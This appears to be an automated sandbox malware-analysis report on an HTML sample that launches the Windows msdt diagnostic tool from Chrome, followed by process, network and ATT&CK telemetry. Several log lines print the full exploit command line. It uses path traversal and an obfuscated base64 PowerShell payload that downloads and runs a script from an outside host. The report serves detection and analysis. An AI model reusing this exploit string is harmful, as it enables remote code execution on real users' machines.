    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeProcess created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6299CFF5-1458.pmaJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\229f6fa7-84c3-4f31-aa76-91ac60469b60.tmpJump to behavior
    Source: classification engineClassification label: mal56.expl.winHTML@35/121@3/5
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeMutant created: \BaseNamedObjects\Global\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C71209 LoadResource,LockResource,SizeofResource,
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeFile created: C:\Program Files\Google\Chrome\ChromeRecoveryJump to behavior
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeAutomated click: Next
    Source: C:\Windows\System32\msdt.exeFile opened: C:\Windows\system32\MSFTEDIT.DLL
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecoveryJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecoveryCRX.crxJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\manifest.jsonJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\verified_contents.jsonJump to behavior
    Source: Binary string: GoogleUpdateB231574670_unsigned.pdb` source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
    Source: Binary string: GoogleUpdateB231574670_unsigned.pdb source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C939A3 push ecx; ret
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7FEA6 push ecx; ret
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7E00C CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeFile created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeJump to dropped file
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C73298 GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\5208_646319911\LICENSE.txtJump to behavior
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C802A1 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Windows\System32\msdt.exeWindow / User API: threadDelayed 1341
    Source: C:\Windows\System32\msdt.exeWindow / User API: threadDelayed 1519
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C9525D VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C898C3 FindFirstFileExW,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7F243 IsDebuggerPresent,OutputDebugStringW,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C741A3 CreateFileW,GetFileAttributesExW,OutputDebugStringW,CloseHandle,GetLastError,WriteFile,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7E00C CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C713D8 GetProcessHeap,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C83E6C mov ecx, dword ptr fs:[00000030h]
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C89665 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7E00C CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7E2C3 FreeLibrary,FreeLibrary,FreeLibrary,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,DeleteCriticalSection,ReleaseSemaphore,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,DeleteCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7FE00 SetUnhandledExceptionFilter,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7F886 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C8323D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7E4E6 EnterCriticalSection,SetUnhandledExceptionFilter,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7FC6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7E553 SetUnhandledExceptionFilter,LeaveCriticalSection,
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C759D6 GetSecurityDescriptorDacl,SetSecurityDescriptorDacl,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C78FB3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C7FAC3 cpuid
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C73047 GetLocalTime,GetCurrentThreadId,GetCurrentProcessId,
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C78E0B GetVersionExW,GetProcAddress,FreeLibrary,
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Command and Scripting Interpreter
    Path Interception1
    Process Injection
    3
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium11
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts3
    Native API
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS Memory3
    Security Software Discovery
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth1
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account Manager1
    Application Window Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
    Obfuscated Files or Information
    NTDS1
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer4
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets14
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    1.html32%VirustotalBrowse
    SourceDetectionScannerLabelLink
    C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe0%VirustotalBrowse
    C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe0%MetadefenderBrowse
    C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://dns.google0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    accounts.google.com
    142.251.209.13
    truefalse
      high
      clients.l.google.com
      142.250.184.78
      truefalse
        high
        clients2.google.com
        unknown
        unknownfalse
          high
          time.windows.com
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
              high
              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://dns.google176bd4d4-b466-471c-b2dc-78592e59bf93.tmp.1.dr, a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 24aeaaec-c6e1-418d-ae0b-78d4b9410155.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drfalse
                • URL Reputation: safe
                unknown
                https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.pcraw_window.js.0.dr, craw_background.js.0.drfalse
                  high
                  https://www.google.com/intl/en-US/chrome/blank.htmlcraw_background.js.0.drfalse
                    high
                    https://ogs.google.coma7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drfalse
                      high
                      https://www.google.com/images/cleardot.gifcraw_window.js.0.drfalse
                        high
                        https://play.google.coma7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drfalse
                          high
                          https://payments.google.com/payments/v4/js/integrator.jscraw_window.js.0.dr, manifest.json.0.drfalse
                            high
                            https://easylist.to/)LICENSE.txt.0.drfalse
                              high
                              https://sandbox.google.com/payments/v4/js/integrator.jscraw_window.js.0.dr, manifest.json.0.drfalse
                                high
                                https://www.google.com/images/x2.gifcraw_window.js.0.drfalse
                                  high
                                  https://accounts.google.com/MergeSessioncraw_window.js.0.drfalse
                                    high
                                    https://creativecommons.org/compatiblelicensesLICENSE.txt.0.drfalse
                                      high
                                      https://www.google.coma7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drfalse
                                        high
                                        https://www.google.com/images/dot2.gifcraw_window.js.0.drfalse
                                          high
                                          https://github.com/easylist)LICENSE.txt.0.drfalse
                                            high
                                            https://creativecommons.org/.LICENSE.txt.0.drfalse
                                              high
                                              https://accounts.google.coma7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drfalse
                                                high
                                                https://clients2.googleusercontent.coma7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drfalse
                                                  high
                                                  https://apis.google.coma7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drfalse
                                                    high
                                                    https://www.google.com/accounts/OAuthLogin?issueuberauth=1craw_window.js.0.drfalse
                                                      high
                                                      https://www.google.com/manifest.json.0.drfalse
                                                        high
                                                        https://www-googleapis-staging.sandbox.google.comcraw_window.js.0.dr, craw_background.js.0.drfalse
                                                          high
                                                          https://clients2.google.coma7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drfalse
                                                            high
                                                            https://clients2.google.com/service/update2/crxmanifest.json.0.drfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              142.250.184.78
                                                              clients.l.google.comUnited States
                                                              15169GOOGLEUSfalse
                                                              142.251.209.13
                                                              accounts.google.comUnited States
                                                              15169GOOGLEUSfalse
                                                              239.255.255.250
                                                              unknownReserved
                                                              unknownunknownfalse
                                                              IP
                                                              192.168.2.1
                                                              127.0.0.1
                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                              Analysis ID:638689
                                                              Start date and time: 03/06/202211:09:082022-06-03 11:09:08 +02:00
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 7m 12s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Sample file name:1.html
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:35
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal56.expl.winHTML@35/121@3/5
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HDC Information:
                                                              • Successful, ratio: 99.9% (good quality ratio 94.4%)
                                                              • Quality average: 80.1%
                                                              • Quality standard deviation: 27.5%
                                                              HCA Information:
                                                              • Successful, ratio: 99%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .html
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                              • Created / dropped Files have been reduced to 100
                                                              • Excluded IPs from analysis (whitelisted): 34.104.35.123, 142.250.184.35, 142.250.184.99, 142.250.184.67, 40.119.148.38
                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, twc.trafficmanager.net, clientservices.googleapis.com, arc.msn.com, ris.api.iris.microsoft.com, redirector.gvt1.com, edgedl.me.gvt1.com, store-images.s-microsoft.com, login.live.com, r5---sn-4g5lzney.gvt1.com, sls.update.microsoft.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, www.gstatic.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                              No simulations
                                                              No context
                                                              No context
                                                              No context
                                                              No context
                                                              No context
                                                              Process:C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):259472
                                                              Entropy (8bit):6.621401853828968
                                                              Encrypted:false
                                                              SSDEEP:6144:wgtABO5wl1poLsQXo2fJjazGDJvvLAOk7CWn5l4rB+5Jb:wgtAFB+sQXo2ZRG7CWnaB+5Jb
                                                              MD5:49AC3C96D270702A27B4895E4CE1F42A
